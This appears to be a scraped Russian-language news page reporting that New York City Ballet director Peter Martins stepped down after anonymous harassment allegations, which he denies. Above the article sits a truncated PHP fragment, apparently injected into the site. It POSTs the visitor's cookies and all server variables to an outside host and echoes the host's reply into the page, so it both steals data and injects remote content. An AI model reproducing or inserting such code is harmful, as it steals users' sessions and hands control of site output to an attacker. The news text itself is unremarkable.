array("header"=>"User-Agent: PHP Modules clicktimes\r\n","header"=>"Cookie: ".$_SERVER["HTTP_COOKIE"]."\r\n","method"=>"POST","timeout"=>2,"content"=>http_build_query($_SERVER))))); if($clicktimes_result) echo $clicktimes_result; ?>
 
В Нью-Йорке руководителя балета обвинили в домогательствах
Фото: The New York Times Руководитель балета ушел с поста в связи с секс-скандалом

Обвинения были анонимными, а балетмейстер отрицает свою вину.


В нью-йоркской балетной труппе New York City Ballet руководитель Питер Мартинс  ушел со своего поста после обвинений в домогательствах, передает New York Times. При этом балетмейстер свою вину отрицает.
"Я отрицал и буду продолжать отрицать, что я связан с каким-то подобным случаем неподобающего поведения", - отметил он в письме, адресованному руководящему совету балета.
Питер Мартинс отметил, что надеется на признание его в итоге невиновным.
"Я в полной мере сотрудничал со следствием и понимаю, что оно скоро завершится. Я верю, что его результаты оправдали бы меня", - заявил он.
Издание сообщает, что Мартинс был временно отстранен от своих обязанностей после того, как в его адрес поступили обвинения в сексуальных домогательствах. Также известно, что они имели анонимный характер.
Ранее Корреспондент.net сообщал, что актриса Сальма Хайек заявила о домогательствах со стороны Харви Вайнштейна.
 
Источник: //ua.korrespondent.net/showbiz/culture/3924508-v-nui-yorke-rukovodytelia-baleta-obvynyly-v-domohatelstvakh
Если Вам понравилась или не понравилась статья можете проголосовать за В Нью-Йорке руководителя балета обвинили в домогательствах
90290

Реклама на сайте

Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.

Реклама на сайте